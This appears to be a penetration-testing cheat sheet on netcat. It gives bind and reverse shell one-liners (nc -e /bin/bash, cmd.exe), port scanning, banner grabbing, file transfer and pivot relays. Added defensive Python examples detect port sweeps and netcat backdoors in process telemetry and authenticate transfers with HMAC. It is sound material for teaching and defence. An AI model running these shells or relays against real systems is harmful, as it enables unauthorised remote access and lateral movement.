
NETCAT (nc)

NETCAT (nc) is also known as the Swiss Army knife for a Penetration Tester. This is used to read from and write to network connections over TCP and UDP.
It is very dependable and is often used to start a listener for a reverse shell. It is feature rich and can be used for the following and many more…


1] Chat between two systems
Start a listener on the local machine:
nc -nlvp [port]
Connect to the listener from another machine:
nc -nv [TargetIPAddress] [Port]
Once the connection is established the chat can go on.

2] Backdoor
Bind Shell: To create a shell on a local port that can then be accessed using a basic nc client
[a] Linux:
nc -nlvp [localport] -e /bin/bash
[b] Windows:
c:\> nc -nlvp [localport] -e cmd.exe
Reverse Shell: To create a reverse shell that will attempt to connect to your IP address on a local port. This shell can then be captured using a nc listener.
[a] Linux:
nc -nv [youripaddress] [port] -e /bin/bash
[b] Windows:
c:\> nc -nv [youripaddress] [port] -e cmd.exe
Reverse shells are pretty useful when dealing with firewalls that might prevent incoming connections.
Note that -e only exists in netcat builds compiled with the GAPING_SECURITY_HOLE option; the OpenBSD-derived netcat shipped by many Linux distributions does not have it, which is why a process launching nc with -e is a strong signal in endpoint telemetry.



3] Banner grabbing (TCP service) – pretty useful if you do not have nmap installed on a pwn3d Linux box from where you are trying to penetrate further.
Linux:
echo "" | nc -nv -w1 [TargetIPAddress] [startport]-[endport]

4] Port scanning
Linux:
nc -nv -z -w1 [TargetIPAddress] [startport]-[endport]
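From the defender's side, a nc sweep like the one above (or the banner grab in 3]) shows up as one source touching many destination ports on one host in a very short time. The following is an added example, not code from the original post: a small sliding-window detector run over a constructed connection log in the shape "epoch src dst dport action". The thresholds, log format and sample addresses are assumptions for the example.

```python
"""Detect nc -z style port sweeps in a connection log (added example)."""
from collections import defaultdict

# Constructed sample: 10.0.0.5 walks ports 20-31 on 10.0.0.9 within two seconds
# (what "nc -nv -z -w1 10.0.0.9 20-31" would produce); 10.0.0.7 makes a few
# ordinary connections spread over half an hour and must not be flagged.
SAMPLE_LOG = """\
# ts src dst dport action   (constructed, not real traffic)
1700000000 10.0.0.5 10.0.0.9 20 SYN
1700000000 10.0.0.5 10.0.0.9 21 SYN
1700000000 10.0.0.5 10.0.0.9 22 SYN
1700000000 10.0.0.5 10.0.0.9 23 SYN
1700000000 10.0.0.5 10.0.0.9 24 SYN
1700000000 10.0.0.5 10.0.0.9 25 SYN
1700000001 10.0.0.5 10.0.0.9 26 SYN
1700000001 10.0.0.5 10.0.0.9 27 SYN
1700000001 10.0.0.5 10.0.0.9 28 SYN
1700000001 10.0.0.5 10.0.0.9 29 SYN
1700000001 10.0.0.5 10.0.0.9 30 SYN
1700000001 10.0.0.5 10.0.0.9 31 SYN
1700000003 10.0.0.7 10.0.0.9 22 SYN
1700000250 10.0.0.7 10.0.0.9 80 SYN
1700000600 10.0.0.7 10.0.0.9 443 SYN
1700001800 10.0.0.7 10.0.0.9 22 SYN
"""


def parse_line(line):
    """Parse one constructed log line into (timestamp, src, dst, dport)."""
    ts, src, dst, dport, _action = line.split()
    return int(ts), src, dst, int(dport)


def find_sweeps(lines, min_ports=10, window_seconds=5):
    """Return {(src, dst): sorted ports} for every source that hit at least
    min_ports distinct ports on one destination inside any window of
    window_seconds. A slow sweep spread over hours is deliberately not
    caught here; that needs a longer-horizon detector."""
    events = defaultdict(list)  # (src, dst) -> [(ts, port), ...]
    for raw in lines:
        raw = raw.strip()
        if not raw or raw.startswith("#"):
            continue
        ts, src, dst, dport = parse_line(raw)
        events[(src, dst)].append((ts, dport))

    findings = {}
    for key, evs in events.items():
        evs.sort()
        flagged = set()
        left = 0
        for right in range(len(evs)):
            # advance the left edge until the window fits in window_seconds
            while evs[right][0] - evs[left][0] > window_seconds:
                left += 1
            window_ports = {p for _, p in evs[left:right + 1]}
            if len(window_ports) >= min_ports:
                flagged |= window_ports
        if flagged:
            findings[key] = sorted(flagged)
    return findings


if __name__ == "__main__":
    for (src, dst), ports in find_sweeps(SAMPLE_LOG.splitlines()).items():
        print(f"sweep: {src} -> {dst} touched {len(ports)} ports {ports[0]}-{ports[-1]}")
```

The -w1 timeout in the nc command is what makes the sweep fast enough to fall inside a short window; lowering window_seconds trades sensitivity to slow sweeps for fewer false positives from busy legitimate clients.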

5] File Transfers
[a] Push a file from client to listener (acting as nc server):
nc -nlvp [localport] > [outfile]
(Starting the nc server to listen on the local port and store whatever arrives in [outfile])
nc -w3 [TargetIPAddress] [Port] < [outfile]
(Connecting to [TargetIPAddress] on [Port] and pushing [outfile] to the listener; -w3 closes the connection three seconds after the data stops)


6] Relays

Linux:

Create a FIFO (named pipe) called backpipe:

cd /tmp
mknod backpipe p

[a] Listener to Client Relay
Create a relay that sends packets from the local port to a nc client:

nc -nlvp [LocalPort] 0<backpipe | nc [TargetIPAddress] [Port] | tee backpipe

From the nc client:
nc -nv [TargetIPAddress] [Port]

[b] Listener to Listener Relay
Create a relay that sends packets from any connection on [LocalPort_1] to any connection on [LocalPort_2]:

nc -nlvp [LocalPort_1] 0<backpipe | nc -nlvp [LocalPort_2] | tee backpipe

[c] Client to Client Relay
Create a relay that sends the packets from the connection to [PreviousHopIPaddress] on [Port1] to a nc client connected to [NextHopIPaddress] on [Port2]:

nc [PreviousHopIPaddress] [Port1] 0<backpipe | nc [NextHopIPaddress] [Port2] | tee backpipe


Windows:

Enter a temporary directory where we will create .bat files:

c:\> cd c:\temp

[a] Listener to Client Relay
Create a relay that sends packets from the local port to a nc client connected to [TargetIPaddress] on [Port]:

c:\> echo nc [TargetIPaddress] [Port] > relay.bat
c:\> nc -nlvp [Localport] -e relay.bat

[b] Listener to Listener Relay
Create a relay that will send packets from any connection on [LocalPort_1] to any connection on [LocalPort_2]:

c:\> echo nc -nlvp [LocalPort_2] > relay.bat
c:\> nc -nlvp [LocalPort_1] -e relay.bat

[c] Client to Client Relay
Create a relay that will send packets from the connection to [PreviousHopIPaddress] on [Port1] to a nc client connected to [NextHopIPaddress] on [Port2]:

c:\> echo nc [NextHopIPaddress] [Port2] > relay.bat
c:\> nc [PreviousHopIPaddress] [Port1] -e relay.bat
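Every command in sections 2] (bind and reverse shells) and 6] (named-pipe and .bat relays) leaves a recognisable command line in process-execution telemetry (auditd, Sysmon event 1, EDR). The following is an added example, not code from the original post: a classifier that splits a recorded command line into pipeline stages, finds the netcat stage and names what it is doing. The event tuples, host names, user names and addresses are constructed; the severity mapping is an assumption for the example.

```python
"""Flag netcat backdoors and relays in process-execution events (added example)."""
import shlex
from os.path import basename

NETCAT_NAMES = {"nc", "netcat", "ncat", "nc.exe", "ncat.exe"}

SEVERITY = {
    "bind shell": "high", "reverse shell": "high", "relay": "high",
    "port scan": "medium", "listener": "medium",
    "client connection": "info", "named pipe": "low",
}

# Constructed (host, user, command line) events mirroring the post's commands.
SAMPLE_EVENTS = [
    ("web01", "www-data", "nc -nlvp 4444 -e /bin/bash"),
    ("web01", "www-data", "nc -nv 203.0.113.10 4444 -e /bin/bash"),
    ("jump01", "ops", "mknod backpipe p"),
    ("jump01", "ops", "nc -nlvp 8080 0<backpipe | nc 10.0.0.9 80 | tee backpipe"),
    ("build01", "ci", "nc -z -w1 10.0.0.9 20-30"),
    ("build01", "ci", "echo hello | nc -nv 10.0.0.9 9000"),
    ("dc01", "SYSTEM", "nc.exe -nlvp 5555 -e cmd.exe"),
]


def split_stages(cmdline):
    """Split a command line into pipeline stages (token lists).
    Assumes POSIX-style quoting; a '|' glued to the next word is handled."""
    stages, cur = [], []
    for tok in shlex.split(cmdline):
        if tok == "|":
            stages.append(cur)
            cur = []
        elif tok.startswith("|") and len(tok) > 1:
            stages.append(cur)
            cur = [tok[1:]]
        else:
            cur.append(tok)
    stages.append(cur)
    return [s for s in stages if s]


def classify_stage(stage):
    """Return what one netcat invocation does, or None if it is not netcat."""
    if not stage or basename(stage[0].replace("\\", "/")).lower() not in NETCAT_NAMES:
        return None
    listen = scan = False
    exec_prog = None
    args = stage[1:]
    for i, tok in enumerate(args):
        if tok in ("-e", "-c") and i + 1 < len(args):
            exec_prog = args[i + 1]          # program handed to the connection
        elif tok.startswith("-") and not tok.startswith("--"):
            letters = tok[1:]                # handles bundled flags like -nlvp
            listen |= "l" in letters
            scan |= "z" in letters
    uses_backpipe = any("backpipe" in t for t in stage)
    if exec_prog and listen:
        return "bind shell"
    if exec_prog:
        return "reverse shell"
    if uses_backpipe:
        return "relay"
    if scan:
        return "port scan"
    if listen:
        return "listener"
    return "client connection"


def scan_events(events):
    """Return (host, user, kind, severity, cmdline) for every notable event."""
    findings = []
    for host, user, cmdline in events:
        stages = split_stages(cmdline)
        if stages and stages[0][0] == "mknod" and "p" in stages[0][1:]:
            findings.append((host, user, "named pipe", SEVERITY["named pipe"], cmdline))
            continue
        for stage in stages:
            kind = classify_stage(stage)
            if kind:
                findings.append((host, user, kind, SEVERITY[kind], cmdline))
                break  # one finding per command line is enough
    return findings


if __name__ == "__main__":
    for host, user, kind, sev, cmd in scan_events(SAMPLE_EVENTS):
        print(f"[{sev:6}] {host}/{user}: {kind}: {cmd}")
```

Any -e or -c is treated as shell execution even when the program is a relay .bat file, which is the right call for triage: a listener that executes a program on connect is the thing to investigate, whatever the program turns out to be. A "named pipe" finding on its own is low severity, but paired with a relay on the same host within minutes it is the full pattern from 6].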
References: Wikipedia, SANS, Offensive Security
www.sans.org/security-

Whoa! That's a lot that we can get done with netcat, isn't it? Yes. However, there are certain limitations of netcat.
The basic fact that nc does not provide authentication or encryption for the incoming and outgoing traffic can be a major drawback: anyone on the path can read or alter what is sent, and whatever connects to a listener is accepted.
In order to overcome these limitations we can use Ncat and sbd.
Most of the above mentioned tasks can be achieved with Ncat and sbd, with the added advantage of encryption, thus ensuring secure traffic.
More on that later. When? I do not know at this point, however I promise to get to that as soon as I find time.
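Until the channel itself is protected, the gap that matters most for the file transfers in 5] is authentication: the listener writes whatever arrives into [outfile]. The following is an added example, not code from the original post or from the nc, Ncat or sbd projects: the sender frames the payload with an HMAC-SHA256 tag under a pre-shared key and the receiver refuses anything that does not verify. The key and payload are constructed sample values; the frame layout is an assumption for the example.

```python
"""Authenticate bytes sent over a plain nc connection with an HMAC tag (added example)."""
import hashlib
import hmac
import struct

TAG_LEN = hashlib.sha256().digest_size  # 32 bytes
HEADER_LEN = 8


def frame(key: bytes, payload: bytes) -> bytes:
    """Wire format: 8-byte big-endian length | payload | HMAC-SHA256(key, length || payload).
    Authenticating the length as well prevents silent truncation."""
    header = struct.pack(">Q", len(payload))
    tag = hmac.new(key, header + payload, hashlib.sha256).digest()
    return header + payload + tag


def unframe(key: bytes, blob: bytes) -> bytes:
    """Verify a frame and return its payload; raise ValueError on any mismatch.
    hmac.compare_digest keeps the tag comparison constant time."""
    if len(blob) < HEADER_LEN + TAG_LEN:
        raise ValueError("frame too short")
    header, rest = blob[:HEADER_LEN], blob[HEADER_LEN:]
    (length,) = struct.unpack(">Q", header)
    if len(rest) != length + TAG_LEN:
        raise ValueError("length mismatch")
    payload, tag = rest[:length], rest[length:]
    expected = hmac.new(key, header + payload, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("authentication failed")
    return payload


def is_authentic(key: bytes, blob: bytes) -> bool:
    """Convenience wrapper for callers that only need a yes/no answer."""
    try:
        unframe(key, blob)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    key = b"constructed-demo-key-do-not-reuse"   # pre-shared out of band
    blob = frame(key, b"contents of the file being pushed")
    # Pipe `blob` into `nc -w3 [TargetIPAddress] [Port]`; the listener side runs
    # `nc -nlvp [localport] > [outfile]` and then calls unframe() on [outfile].
    print("genuine frame accepted:", is_authentic(key, blob))
    tampered = bytearray(blob)
    tampered[HEADER_LEN] ^= 0xFF                  # flip one payload byte
    print("tampered frame accepted:", is_authentic(key, bytes(tampered)))
    print("wrong key accepted:", is_authentic(b"other-key", blob))
```

This gives integrity and origin authentication, not confidentiality: an observer still reads the payload, which is exactly the remaining gap that Ncat's --ssl and sbd close.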
